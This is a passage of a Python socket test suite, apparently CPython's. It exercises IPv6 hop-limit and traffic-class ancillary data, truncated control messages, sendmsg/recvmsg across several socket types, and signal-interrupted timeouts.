self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], maxhop)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testRecvHopLimit(self):
# Test receiving the packet hop limit as ancillary data.
self.checkHopLimit(ancbufsize=10240)
@testRecvHopLimit.client_skip
def _testRecvHopLimit(self):
# Need to wait until server has asked to receive ancillary
# data, as implementations are not required to buffer it
# otherwise.
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testRecvHopLimitCMSG_SPACE(self):
# Test receiving hop limit, using CMSG_SPACE to calculate buffer size.
self.checkHopLimit(ancbufsize=socket.CMSG_SPACE(SIZEOF_INT))
@testRecvHopLimitCMSG_SPACE.client_skip
def _testRecvHopLimitCMSG_SPACE(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Could test receiving into buffer sized using CMSG_LEN, but RFC
# 3542 says portable applications must provide space for trailing
# padding. Implementations may set MSG_CTRUNC if there isn't
# enough space for the padding.
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSetHopLimit(self):
# Test setting hop limit on outgoing packet and receiving it
# at the other end.
self.checkHopLimit(ancbufsize=10240, maxhop=self.hop_limit)
@testSetHopLimit.client_skip
def _testSetHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))]),
len(MSG))
def checkTrafficClassAndHopLimit(self, ancbufsize, maxhop=255,
ignoreflags=0):
# Receive traffic class and hop limit into ancbufsize bytes of
# ancillary data space. Check that data is MSG, ancillary
# data is not truncated (but ignore any flags in ignoreflags),
# and traffic class and hop limit are in range (hop limit no
# more than maxhop).
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 2)
ancmap = self.ancillaryMapping(ancdata)
tcdata = ancmap[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS)]
self.assertEqual(len(tcdata), SIZEOF_INT)
a = array.array("i")
a.frombytes(tcdata)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
hldata = ancmap[(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT)]
self.assertEqual(len(hldata), SIZEOF_INT)
a = array.array("i")
a.frombytes(hldata)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], maxhop)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testRecvTrafficClassAndHopLimit(self):
# Test receiving traffic class and hop limit as ancillary data.
self.checkTrafficClassAndHopLimit(ancbufsize=10240)
@testRecvTrafficClassAndHopLimit.client_skip
def _testRecvTrafficClassAndHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testRecvTrafficClassAndHopLimitCMSG_SPACE(self):
# Test receiving traffic class and hop limit, using
# CMSG_SPACE() to calculate buffer size.
self.checkTrafficClassAndHopLimit(
ancbufsize=socket.CMSG_SPACE(SIZEOF_INT) * 2)
@testRecvTrafficClassAndHopLimitCMSG_SPACE.client_skip
def _testRecvTrafficClassAndHopLimitCMSG_SPACE(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSetTrafficClassAndHopLimit(self):
# Test setting traffic class and hop limit on outgoing packet,
# and receiving them at the other end.
self.checkTrafficClassAndHopLimit(ancbufsize=10240,
maxhop=self.hop_limit)
@testSetTrafficClassAndHopLimit.client_skip
def _testSetTrafficClassAndHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class])),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))]),
len(MSG))
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testOddCmsgSize(self):
# Try to send ancillary data with first item one byte too
# long. Fall back to sending with correct size if this fails,
# and check that second item was handled correctly.
self.checkTrafficClassAndHopLimit(ancbufsize=10240,
maxhop=self.hop_limit)
@testOddCmsgSize.client_skip
def _testOddCmsgSize(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
try:
nbytes = self.sendmsgToServer(
[MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class]).tobytes() + b"\x00"),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))])
except OSError as e:
self.assertIsInstance(e.errno, int)
nbytes = self.sendmsgToServer(
[MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class])),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))])
self.assertEqual(nbytes, len(MSG))
# Tests for proper handling of truncated ancillary data
def checkHopLimitTruncatedHeader(self, ancbufsize, ignoreflags=0):
# Receive hop limit into ancbufsize bytes of ancillary data
# space, which should be too small to contain the ancillary
# data header (if ancbufsize is None, pass no second argument
# to recvmsg()). Check that data is MSG, MSG_CTRUNC is set
# (unless included in ignoreflags), and no ancillary data is
# returned.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
args = () if ancbufsize is None else (ancbufsize,)
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), *args)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testCmsgTruncNoBufSize(self):
# Check that no ancillary data is received when no ancillary
# buffer size is provided.
self.checkHopLimitTruncatedHeader(ancbufsize=None,
# BSD seems to set
# MSG_CTRUNC only if an item
# has been partially
# received.
ignoreflags=socket.MSG_CTRUNC)
@testCmsgTruncNoBufSize.client_skip
def _testCmsgTruncNoBufSize(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc0(self):
# Check that no ancillary data is received when ancillary
# buffer size is zero.
self.checkHopLimitTruncatedHeader(ancbufsize=0,
ignoreflags=socket.MSG_CTRUNC)
@testSingleCmsgTrunc0.client_skip
def _testSingleCmsgTrunc0(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Check that no ancillary data is returned for various non-zero
# (but still too small) buffer sizes.
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc1(self):
self.checkHopLimitTruncatedHeader(ancbufsize=1)
@testSingleCmsgTrunc1.client_skip
def _testSingleCmsgTrunc1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc2Int(self):
self.checkHopLimitTruncatedHeader(ancbufsize=2 * SIZEOF_INT)
@testSingleCmsgTrunc2Int.client_skip
def _testSingleCmsgTrunc2Int(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTruncLen0Minus1(self):
self.checkHopLimitTruncatedHeader(ancbufsize=socket.CMSG_LEN(0) - 1)
@testSingleCmsgTruncLen0Minus1.client_skip
def _testSingleCmsgTruncLen0Minus1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTruncInData(self):
# Test truncation of a control message inside its associated
# data. The message may be returned with its data truncated,
# or not returned at all.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(
self.serv_sock, len(MSG), socket.CMSG_LEN(SIZEOF_INT) - 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 1)
if ancdata:
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertEqual(cmsg_type, socket.IPV6_HOPLIMIT)
self.assertLess(len(cmsg_data), SIZEOF_INT)
@testSingleCmsgTruncInData.client_skip
def _testSingleCmsgTruncInData(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
def checkTruncatedSecondHeader(self, ancbufsize, ignoreflags=0):
# Receive traffic class and hop limit into ancbufsize bytes of
# ancillary data space, which should be large enough to
# contain the first item, but too small to contain the header
# of the second. Check that data is MSG, MSG_CTRUNC is set
# (unless included in ignoreflags), and only one ancillary
# data item is returned.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 1)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertIn(cmsg_type, {socket.IPV6_TCLASS, socket.IPV6_HOPLIMIT})
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
# Try the above test with various buffer sizes.
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc0(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT),
ignoreflags=socket.MSG_CTRUNC)
@testSecondCmsgTrunc0.client_skip
def _testSecondCmsgTrunc0(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc1(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) + 1)
@testSecondCmsgTrunc1.client_skip
def _testSecondCmsgTrunc1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc2Int(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) +
2 * SIZEOF_INT)
@testSecondCmsgTrunc2Int.client_skip
def _testSecondCmsgTrunc2Int(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTruncLen0Minus1(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) +
socket.CMSG_LEN(0) - 1)
@testSecondCmsgTruncLen0Minus1.client_skip
def _testSecondCmsgTruncLen0Minus1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTruncInData(self):
# Test truncation of the second of two control messages inside
# its associated data.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(
self.serv_sock, len(MSG),
socket.CMSG_SPACE(SIZEOF_INT) + socket.CMSG_LEN(SIZEOF_INT) - 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
cmsg_types = {socket.IPV6_TCLASS, socket.IPV6_HOPLIMIT}
cmsg_level, cmsg_type, cmsg_data = ancdata.pop(0)
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
cmsg_types.remove(cmsg_type)
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
if ancdata:
cmsg_level, cmsg_type, cmsg_data = ancdata.pop(0)
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
cmsg_types.remove(cmsg_type)
self.assertLess(len(cmsg_data), SIZEOF_INT)
self.assertEqual(ancdata, [])
@testSecondCmsgTruncInData.client_skip
def _testSecondCmsgTruncInData(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
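# Illustrative sketch (not executed by the test suite): how an application
# would read the hop limit of an incoming IPv6 datagram as RFC 3542
# ancillary data, which is what RFC3542AncillaryTest exercises above.
# Assumes an IPv6-capable host exposing IPV6_RECVHOPLIMIT/IPV6_HOPLIMIT;
# `sock` is a hypothetical bound AF_INET6/SOCK_DGRAM socket.
def _example_recv_hop_limit(sock):
    sock.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_RECVHOPLIMIT, 1)
    ancbuf = socket.CMSG_SPACE(array.array("i").itemsize)
    msg, ancdata, flags, addr = sock.recvmsg(4096, ancbuf)
    for cmsg_level, cmsg_type, cmsg_data in ancdata:
        if (cmsg_level, cmsg_type) == (socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT):
            (hop_limit,) = array.array("i", cmsg_data)
            return msg, addr, hop_limit
    return msg, addr, None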
# Derive concrete test classes for different socket types.
class SendrecvmsgUDPTestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDPTestBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@unittest.skipUnless(thread, 'Threading required for this test.')
class SendmsgUDPTest(SendmsgConnectionlessTests, SendrecvmsgUDPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgUDPTest(RecvmsgTests, SendrecvmsgUDPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgIntoUDPTest(RecvmsgIntoTests, SendrecvmsgUDPTestBase):
pass
class SendrecvmsgUDP6TestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDP6TestBase):
def checkRecvmsgAddress(self, addr1, addr2):
# Called to compare the received address with the address of
# the peer, ignoring scope ID
self.assertEqual(addr1[:-1], addr2[:-1])
@requireAttrs(socket.socket, "sendmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
@unittest.skipUnless(thread, 'Threading required for this test.')
class SendmsgUDP6Test(SendmsgConnectionlessTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgUDP6Test(RecvmsgTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgIntoUDP6Test(RecvmsgIntoTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgRFC3542AncillaryUDP6Test(RFC3542AncillaryTest,
SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgIntoRFC3542AncillaryUDP6Test(RecvmsgIntoMixin,
RFC3542AncillaryTest,
SendrecvmsgUDP6TestBase):
pass
class SendrecvmsgTCPTestBase(SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, TCPTestBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@unittest.skipUnless(thread, 'Threading required for this test.')
class SendmsgTCPTest(SendmsgStreamTests, SendrecvmsgTCPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgTCPTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgTCPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgIntoTCPTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgTCPTestBase):
pass
class SendrecvmsgSCTPStreamTestBase(SendrecvmsgSCTPFlagsBase,
SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, SCTPStreamBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
@unittest.skipUnless(thread, 'Threading required for this test.')
class SendmsgSCTPStreamTest(SendmsgStreamTests, SendrecvmsgSCTPStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgSCTPStreamTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgSCTPStreamTestBase):
def testRecvmsgEOF(self):
try:
super(RecvmsgSCTPStreamTest, self).testRecvmsgEOF()
except OSError as e:
if e.errno != errno.ENOTCONN:
raise
self.skipTest("sporadic ENOTCONN (kernel issue?) - see issue #13876")
@requireAttrs(socket.socket, "recvmsg_into")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgIntoSCTPStreamTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgSCTPStreamTestBase):
def testRecvmsgEOF(self):
try:
super(RecvmsgIntoSCTPStreamTest, self).testRecvmsgEOF()
except OSError as e:
if e.errno != errno.ENOTCONN:
raise
self.skipTest("sporadic ENOTCONN (kernel issue?) - see issue #13876")
class SendrecvmsgUnixStreamTestBase(SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, UnixStreamBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "AF_UNIX")
@unittest.skipUnless(thread, 'Threading required for this test.')
class SendmsgUnixStreamTest(SendmsgStreamTests, SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@requireAttrs(socket, "AF_UNIX")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgUnixStreamTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@requireAttrs(socket, "AF_UNIX")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgIntoUnixStreamTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "sendmsg", "recvmsg")
@requireAttrs(socket, "AF_UNIX", "SOL_SOCKET", "SCM_RIGHTS")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgSCMRightsStreamTest(SCMRightsTest, SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "sendmsg", "recvmsg_into")
@requireAttrs(socket, "AF_UNIX", "SOL_SOCKET", "SCM_RIGHTS")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgIntoSCMRightsStreamTest(RecvmsgIntoMixin, SCMRightsTest,
SendrecvmsgUnixStreamTestBase):
pass
# Test interrupting the interruptible send/receive methods with a
# signal when a timeout is set. These tests avoid having multiple
# threads alive during the test so that the OS cannot deliver the
# signal to the wrong one.
class InterruptedTimeoutBase(unittest.TestCase):
# Base class for interrupted send/receive tests. Installs an
# empty handler for SIGALRM and removes it on teardown, along with
# any scheduled alarms.
def setUp(self):
super().setUp()
orig_alrm_handler = signal.signal(signal.SIGALRM,
lambda signum, frame: 1 / 0)
self.addCleanup(signal.signal, signal.SIGALRM, orig_alrm_handler)
self.addCleanup(self.setAlarm, 0)
# Timeout for socket operations
timeout = 4.0
# Provide setAlarm() method to schedule delivery of SIGALRM after
# given number of seconds, or cancel it if zero, and an
# appropriate time value to use. Use setitimer() if available.
if hasattr(signal, "setitimer"):
alarm_time = 0.05
def setAlarm(self, seconds):
signal.setitimer(signal.ITIMER_REAL, seconds)
else:
# Old systems may deliver the alarm up to one second early
alarm_time = 2
def setAlarm(self, seconds):
signal.alarm(seconds)
# Require siginterrupt() in order to ensure that system calls are
# interrupted by default.
@requireAttrs(signal, "siginterrupt")
@unittest.skipUnless(hasattr(signal, "alarm") or hasattr(signal, "setitimer"),
"Don't have signal.alarm or signal.setitimer")
class InterruptedRecvTimeoutTest(InterruptedTimeoutBase, UDPTestBase):
# Test interrupting the recv*() methods with signals when a
# timeout is set.
def setUp(self):
super().setUp()
self.serv.settimeout(self.timeout)
def checkInterruptedRecv(self, func, *args, **kwargs):
# Check that func(*args, **kwargs) raises ZeroDivisionError (the
# exception raised by the SIGALRM handler installed in setUp) when
# interrupted by a signal.
self.setAlarm(self.alarm_time)
with self.assertRaises(ZeroDivisionError) as cm:
func(*args, **kwargs)
def testInterruptedRecvTimeout(self):
self.checkInterruptedRecv(self.serv.recv, 1024)
def testInterruptedRecvIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recv_into, bytearray(1024))
def testInterruptedRecvfromTimeout(self):
self.checkInterruptedRecv(self.serv.recvfrom, 1024)
def testInterruptedRecvfromIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recvfrom_into, bytearray(1024))
@requireAttrs(socket.socket, "recvmsg")
def testInterruptedRecvmsgTimeout(self):
self.checkInterruptedRecv(self.serv.recvmsg, 1024)
@requireAttrs(socket.socket, "recvmsg_into")
def testInterruptedRecvmsgIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recvmsg_into, [bytearray(1024)])
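# Illustrative sketch (not executed by the test suite): the mechanism the
# interruption tests above rely on -- a SIGALRM handler that raises, so a
# blocking recv() with a timeout set is aborted and the handler's exception
# propagates instead of socket.timeout.  Unix-only; assumes signal.setitimer
# is available.
def _example_interrupted_recv(sock, delay=0.05):
    class _Interrupted(Exception):
        pass
    def _handler(signum, frame):
        raise _Interrupted
    old_handler = signal.signal(signal.SIGALRM, _handler)
    try:
        signal.setitimer(signal.ITIMER_REAL, delay)
        try:
            return sock.recv(1024)
        except _Interrupted:
            return None           # interrupted before any data arrived
    finally:
        signal.setitimer(signal.ITIMER_REAL, 0)
        signal.signal(signal.SIGALRM, old_handler)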
# Require siginterrupt() in order to ensure that system calls are
# interrupted by default.
@requireAttrs(signal, "siginterrupt")
@unittest.skipUnless(hasattr(signal, "alarm") or hasattr(signal, "setitimer"),
"Don't have signal.alarm or signal.setitimer")
@unittest.skipUnless(thread, 'Threading required for this test.')
class InterruptedSendTimeoutTest(InterruptedTimeoutBase,
ThreadSafeCleanupTestCase,
SocketListeningTestMixin, TCPTestBase):
# Test interrupting the interruptible send*() methods with signals
# when a timeout is set.
def setUp(self):
super().setUp()
self.serv_conn = self.newSocket()
self.addCleanup(self.serv_conn.close)
# Use a thread to complete the connection, but wait for it to
# terminate before running the test, so that there is only one
# thread to accept the signal.
cli_thread = threading.Thread(target=self.doConnect)
cli_thread.start()
self.cli_conn, addr = self.serv.accept()
self.addCleanup(self.cli_conn.close)
cli_thread.join()
self.serv_conn.settimeout(self.timeout)
def doConnect(self):
self.serv_conn.connect(self.serv_addr)
def checkInterruptedSend(self, func, *args, **kwargs):
# Check that func(*args, **kwargs), run in a loop, raises
# ZeroDivisionError (the exception raised by the SIGALRM handler
# installed in setUp) when interrupted by a signal.
with self.assertRaises(ZeroDivisionError) as cm:
while True:
self.setAlarm(self.alarm_time)
func(*args, **kwargs)
# Issue #12958: The following tests have problems on OS X prior to 10.7
@support.requires_mac_ver(10, 7)
def testInterruptedSendTimeout(self):
self.checkInterruptedSend(self.serv_conn.send, b"a"*512)
@support.requires_mac_ver(10, 7)
def testInterruptedSendtoTimeout(self):
# Passing an actual address here as Python's wrapper for
# sendto() doesn't allow passing a zero-length one; POSIX
# requires that the address is ignored since the socket is
# connection-mode, however.
self.checkInterruptedSend(self.serv_conn.sendto, b"a"*512,
self.serv_addr)
@support.requires_mac_ver(10, 7)
@requireAttrs(socket.socket, "sendmsg")
def testInterruptedSendmsgTimeout(self):
self.checkInterruptedSend(self.serv_conn.sendmsg, [b"a"*512])
@unittest.skipUnless(thread, 'Threading required for this test.')
class TCPCloserTest(ThreadedTCPSocketTest):
def testClose(self):
conn, addr = self.serv.accept()
conn.close()
sd = self.cli
read, write, err = select.select([sd], [], [], 1.0)
self.assertEqual(read, [sd])
self.assertEqual(sd.recv(1), b'')
# Calling close() many times should be safe.
conn.close()
conn.close()
def _testClose(self):
self.cli.connect((HOST, self.port))
time.sleep(1.0)
@unittest.skipUnless(thread, 'Threading required for this test.')
class BasicSocketPairTest(SocketPairTest):
def __init__(self, methodName='runTest'):
SocketPairTest.__init__(self, methodName=methodName)
def _check_defaults(self, sock):
self.assertIsInstance(sock, socket.socket)
if hasattr(socket, 'AF_UNIX'):
self.assertEqual(sock.family, socket.AF_UNIX)
else:
self.assertEqual(sock.family, socket.AF_INET)
self.assertEqual(sock.type, socket.SOCK_STREAM)
self.assertEqual(sock.proto, 0)
def _testDefaults(self):
self._check_defaults(self.cli)
def testDefaults(self):
self._check_defaults(self.serv)
def testRecv(self):
msg = self.serv.recv(1024)
self.assertEqual(msg, MSG)
def _testRecv(self):
self.cli.send(MSG)
def testSend(self):
self.serv.send(MSG)
def _testSend(self):
msg = self.cli.recv(1024)
self.assertEqual(msg, MSG)
@unittest.skipUnless(thread, 'Threading required for this test.')
class NonBlockingTCPTests(ThreadedTCPSocketTest):
def __init__(self, methodName='runTest'):
ThreadedTCPSocketTest.__init__(self, methodName=methodName)
def testSetBlocking(self):
# Testing whether setblocking() works
self.serv.setblocking(True)
self.assertIsNone(self.serv.gettimeout())
self.serv.setblocking(False)
self.assertEqual(self.serv.gettimeout(), 0.0)
start = time.time()
try:
self.serv.accept()
except OSError:
pass
end = time.time()
self.assertTrue((end - start) < 1.0, "Error setting non-blocking mode.")
def _testSetBlocking(self):
pass
@support.cpython_only
def testSetBlocking_overflow(self):
# Issue 15989
import _testcapi
if _testcapi.UINT_MAX >= _testcapi.ULONG_MAX:
self.skipTest('needs UINT_MAX < ULONG_MAX')
self.serv.setblocking(False)
self.assertEqual(self.serv.gettimeout(), 0.0)
self.serv.setblocking(_testcapi.UINT_MAX + 1)
